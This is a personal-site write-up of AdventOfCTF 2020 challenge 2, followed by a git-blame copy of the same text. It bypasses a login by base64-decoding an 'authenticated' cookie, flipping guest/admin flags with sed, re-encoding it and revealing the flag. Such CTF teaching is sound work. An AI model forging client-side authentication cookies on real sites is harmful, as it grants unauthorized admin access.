Personal-Website/content/writeups/adventofctf/2020/challenge_2.md

+++
author = "Maik de Kruif"
title = "Cookiemonster"
subtitle = "Challenge 2 - AdventOfCTF"
date = 2020-12-02T17:30:25+01:00
description = "A writeup for challenge 2 of AdventOfCTF."
cover = "img/writeups/adventofctf/2020/948b1eb046c96865a05808660ee99e10.png"
tags = [
    "AdventOfCTF",
    "challenge",
    "ctf",
    "hacking",
    "writeup",
    "web",
    "cookies",
]
categories = [
    "ctf",
    "writeups",
    "hacking",
]
aliases = [
    "challenge_2"
]
+++

- Points: 200

## Description

For the 2nd challenge you will need to bypass the login mechanism.

Visit <https://02.adventofctf.com> to start the challenge.

## Solution

When opening the website we're provided with a login form. If we fill in the form with random data, we're greeted with some text that says a guest cannot access the flag.

After trying several things, I opened the devtools to have a look at the cookies. Here we find a cookie with the name `authenticated`:

```cookie
authenticated=eyJndWVzdCI6InRydWUiLCJhZG1pbiI6ImZhbHNlIn0%3D
```

The value of this cookie looks like a base64 encoded string so lets try to decode it:

_Note: in a url encoded string, the text `%3D` means a `=`._

```bash
> echo "eyJndWVzdCI6InRydWUiLCJhZG1pbiI6ImZhbHNlIn0=" | base64 -d
{"guest":"true","admin":"false"}%
```

The result is some JSON data which specifies whether we are a guest or an admin.

Normally, we can easily alter the string to say we're an admin, but this time there is some weird non-printable character at the end. This means we can't easily modify it while still having the correct response. To circumvent this, I'll use `sed` to replace the string while keeping the non-printable character:

```bash
> echo "eyJndWVzdCI6InRydWUiLCJhZG1pbiI6ImZhbHNlIn0=" | base64 -d | sed 's/"guest":"true"/"guest":"false"/g' | sed 's/"admin":"false"/"admin":"true"/g' | base64
eyJndWVzdCI6ImZhbHNlIiwiYWRtaW4iOiJ0cnVlIn0=
```

If we put this string back into the cookie and refresh the page we get the flag: `NOVI{cookies_are_bad_for_auth}`.

This flag can then be submitted for the [challenge](https://ctfd.adventofctf.com/challenges#2-3).
Add some ctf writeups 4 years ago			`+++`
			`author = "Maik de Kruif"`
Set actual titles of the challenges as I only just found them 3 years ago			`title = "Cookiemonster"`
Restructure writeups 3 years ago			`subtitle = "Challenge 2 - AdventOfCTF"`
Add some ctf writeups 4 years ago			`date = 2020-12-02T17:30:25+01:00`
Update descriptions 4 years ago			`description = "A writeup for challenge 2 of AdventOfCTF."`
Restructure writeups 3 years ago			`cover = "img/writeups/adventofctf/2020/948b1eb046c96865a05808660ee99e10.png"`
Add some ctf writeups 4 years ago			`tags = [`
			`"AdventOfCTF",`
			`"challenge",`
			`"ctf",`
Update tags and categories 4 years ago			`"hacking",`
			`"writeup",`
Add type of challenge to tag 4 years ago			`"web",`
Add more tags :) 4 years ago			`"cookies",`
Add some ctf writeups 4 years ago			`]`
			`categories = [`
			`"ctf",`
Update tags and categories 4 years ago			`"writeups",`
Add some ctf writeups 4 years ago			`"hacking",`
			`]`
Add breadcrumbs, let writeup urls make more sense and add section pages 3 years ago			`aliases = [`
			`"challenge_2"`
			`]`
Add some ctf writeups 4 years ago			`+++`

			`- Points: 200`

			`## Description`

			`For the 2nd challenge you will need to bypass the login mechanism.`

			`Visit <https://02.adventofctf.com> to start the challenge.`

			`## Solution`

			`When opening the website we're provided with a login form. If we fill in the form with random data, we're greeted with some text that says a guest cannot access the flag.`

Fix a typo 4 years ago			After trying several things, I opened the devtools to have a look at the cookies. Here we find a cookie with the name `authenticated`:
Add some ctf writeups 4 years ago
			```cookie
			`authenticated=eyJndWVzdCI6InRydWUiLCJhZG1pbiI6ImZhbHNlIn0%3D`
			```

			`The value of this cookie looks like a base64 encoded string so lets try to decode it:`

			_Note: in a url encoded string, the text `%3D` means a `=`._

			```bash
			`> echo "eyJndWVzdCI6InRydWUiLCJhZG1pbiI6ImZhbHNlIn0=" \| base64 -d`
			`{"guest":"true","admin":"false"}%`
			```

			`The result is some JSON data which specifies whether we are a guest or an admin.`

			Normally, we can easily alter the string to say we're an admin, but this time there is some weird non-printable character at the end. This means we can't easily modify it while still having the correct response. To circumvent this, I'll use `sed` to replace the string while keeping the non-printable character:

			```bash
			`> echo "eyJndWVzdCI6InRydWUiLCJhZG1pbiI6ImZhbHNlIn0=" \| base64 -d \| sed 's/"guest":"true"/"guest":"false"/g' \| sed 's/"admin":"false"/"admin":"true"/g' \| base64`
			`eyJndWVzdCI6ImZhbHNlIiwiYWRtaW4iOiJ0cnVlIn0=`
			```

			If we put this string back into the cookie and refresh the page we get the flag: `NOVI{cookies_are_bad_for_auth}`.

			`This flag can then be submitted for the [challenge](https://ctfd.adventofctf.com/challenges#2-3).`